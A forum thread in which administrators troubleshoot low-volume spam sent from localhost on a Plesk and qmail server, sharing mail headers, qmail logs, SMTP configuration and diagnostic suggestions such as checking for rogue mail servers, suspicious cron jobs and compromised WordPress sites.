Question Spam from localhost

[MarcusR]

one of my servers start sending spam, not many like 10 or 20 a day

Debian 7.11
Plesk Version 12.0.18
Qmail
With mailman and localhost 127.0.0.1 in whitelist

this is the fact:
- spam has sent with different domain hosted in the server
- sometime mail sender is real mail box but some time is an existent alias with non existent mailbox
- sendmail-wrapper is inconspicuous
- doublechecked php scripts, nothing

this is header of those mail

Return-Path: <existing_mailbox@on_my_server.com>
Received: (qmail 4582 invoked from network); 22 Aug 2016 08:40:45 +0200
Received: from localhost (HELO existing_domain_on_my_server.com) (127.0.0.1)
  by localhost with ESMTPA; 22 Aug 2016 08:40:45 +0200
Date: Mon, 22 Aug 2016 06:40:45 +0000 (UTC)
From: denox-kfz <existing_mailbox@on_my_server.com>
To: [email protected]
Message-ID: <929839540.19093687.1471848045740@existing_domain_on_my_server.com>
Subject:  hi jamesydaboy2k8
MIME-Version: 1.0
Content-Type: multipart/alternative;
  boundary="----=_Part_19093686_1967554495.1471848045740"
X-mailer: Mailer v1.0

log

Aug 22 08:40:45 my_server /var/qmail/bin/relaylock[4577]: /var/qmail/bin/relaylock: mail from 127.0.0.1:51000 (localhost)
Aug 22 08:40:45 my_server qmail-queue-handlers[4579]: Handlers Filter before-queue for qmail started ...
Aug 22 08:40:45 my_server qmail-queue-handlers[4579]: from=existing_mailbox@on_my_server.com
Aug 22 08:40:45 my_server qmail-queue-handlers[4579]: [email protected]
Aug 22 08:40:45 my_server greylisting filter[4580]: Starting greylisting filter...
Aug 22 08:40:45 my_server qmail-queue-handlers[4579]: handlers_stderr: SKIP
Aug 22 08:40:45 my_server qmail-queue-handlers[4579]: SKIP during call 'grey' handler
Aug 22 08:40:45 my_server qmail-queue-handlers[4579]: handlers_stderr: SKIP
Aug 22 08:40:45 my_server qmail-queue-handlers[4579]: SKIP during call 'check-quota' handler
Aug 22 08:40:45 my_server qmail-queue-handlers[4579]: starter: submitter[4582] exited normally
Aug 22 08:40:46 my_server qmail: 1471848046.264218 new msg 11936894
Aug 22 08:40:46 my_server qmail: 1471848046.264244 info msg 11936894: bytes 1678 from <existing_mailbox@on_my_server.comqp 4582 uid 2020
Aug 22 08:40:46 my_server qmail: 1471848046.731967 starting delivery 532: msg 11936894 to remote [email protected]
Aug 22 08:40:46 my_server qmail: 1471848046.731993 status: local 0/10 remote 1/20
Aug 22 08:40:46 my_server qmail-remote-handlers[4585]: Handlers Filter before-remote for qmail started ...
Aug 22 08:40:46 my_server qmail-remote-handlers[4585]: from=existing_mailbox@on_my_server.com
Aug 22 08:40:46 my_server qmail-remote-handlers[4585]: [email protected]

any idea to get rid of that s**t, garbage?

 

[MarcusR]

no one?

 

[UFHH01]

Hi MarcusR,

consider to locate the source of the spam:

Many email messages are sent from PHP scripts on the server. How to find the domains on which these scripts are running? ( KB - article 1711 for QMAIL - usage)
Many email messages are sent from PHP scripts on a server. How to find domains on which these scripts are running if Postfix is used? ( KB - article 114845 for POSTFIX - usage )​

For further investigations, pls. consider to post as well your mail - server configuration files:

Plesk for Linux services logs and configuration files ( KB - article: 111 283 )​

 

[MarcusR]

HI UFHH01,
thx for your repley - i knew these kb articles already. There is nothing special, like compromised script ....
The HELO comes from an existing_domain_on_my_server.com, but not from the regular mailservername
Just for testing purposes i removed 127.0.0.1 from the whitelist,solved, but now i have an problem with mailman.

qmail cfg:
smtp

socket_type     = stream
    protocol        = tcp
    wait            = no
    disable        = no
    user            = root
    flags        = IPv6
    instances       = UNLIMITED
    env             = SMTPAUTH=1
    server          = /var/qmail/bin/tcp-env
    server_args     = -Rt0 /var/qmail/bin/relaylock /usr/sbin/rblsmtpd -r sbl.spamhaus.org -r zen.spamhaus.org -r ix.dnsbl.manitu.net /var/qmail/bin/qmail-smtpd /var/qmail/bin/smtp_auth /var/qmail/bin/true /var/qmail/bin/cmd5checkpw /var/qmail/bin/true

smtps

    socket_type     = stream
    protocol        = tcp
    wait            = no
    disable        = no
    user            = root
    flags        = IPv6
    instances       = UNLIMITED
    env             = SMTPAUTH=1
    server          = /var/qmail/bin/tcp-env
    server_args     = -Rt0 /var/qmail/bin/relaylock /usr/sbin/rblsmtpd -r sbl.spamhaus.org -r zen.spamhaus.org -r ix.dnsbl.manitu.net /var/qmail/bin/qmail-smtpd /var/qmail/bin/smtp_auth /var/qmail/bin/true /var/qmail/bin/cmd5checkpw /var/qmail/bin/true

submission

    socket_type     = stream
    protocol        = tcp
    wait            = no
    disable        = no
    user            = qmaild
    flags        = IPv6
    instances       = UNLIMITED
    env             = SUBMISSION=1 SMTPAUTH=1
    server          = /var/qmail/bin/tcp-env
    server_args     = -Rt0 /var/qmail/bin/qmail-smtpd /var/qmail/bin/smtp_auth /var/qmail/bin/true /var/qmail/bin/cmd5checkpw /var/qmail/bin/true

[/CODE]

 

[Bitpalast]

Check the process list (ps -aux) on your console whether a second SMTP server has been installed, e.g. exim (ps -aux | grep exim). Check your crontab jobs whether there are jobs with awkward names like /var/tmp/Xdj389a.php. Hackers have lately been using Plesk accounts with shell access to set-up a Cron job that runs a script in the temporary directory which in turn starts a mail server that they brought in. Spam is then being sent through that mailserver, bypassing all Plesk security mechanism and not showing the source in /var/log/maillog.

 

[Andrew_Pa]

Hello!

I have exactly the same problem with @MarcusR ! Everything is like @MarcusR described.

I have also checked the crontab as @Peter Debik suggested but there is nothing special there.

Please is there any solution about that?

 

[PleskyStuff]

Anyone figure this out? We are experiencing the same thing and having such a hard time tracking down the culprit.

Peter - we did find one of those. It was a cron named apache pointing to a script in /var/tmp/ ... removed that however the subtle spam messages are still creeping through. Plesk shows failure notice (bounce) however once you drill-in we see it's coming from localhost with a from like this: From: " Facebook 2 friend request"

Hoping someone out there can help. Thanks.

 

[Bitpalast]

Spam can have many different sources. If you found one it does not necessarily mean that spam stops, because other scripts will still be active. Many times Wordpress or Joomla installations have been hacked. They might send a low number of spams every once in a while to bypass outgoing mail limits. Your only option in such cases is to identify the bad plugin and remove it, to clean the website of malware. If the source is "localhost" the spam is most likely coming from such a compromised website. Lately we have also seen spam sent through the known Wordpress Jetpack vulnerability (Topic: Jetpack Sharing email can be abused for spam « WordPress.org Forums), but there can be many more sources.

 

[PleskyStuff]

Thanks Peter. Yup I thought we had it solved last night however it's spamming again this morning. Yesterday we followed the plesk guidelines and monitored then verified all scripts that were triggered and none of them looked suspicious. It's definitely a hard-to-find. Maybe you're right with regards to wordpress. There are a number of client instances installed but haven't found any with blatant hacks. I will checkout jetback. Any other advice or suggestions is appreciated. Thanks!

 

[PleskyStuff]

We have seen a reduction in spam by blocking ssh through the firewall and only allowing specific IP addresses. That certainly helped. Some spam is still creeping through and working to locate it. This is by far the hardest spam fight I have ever faced... stay tuned for more.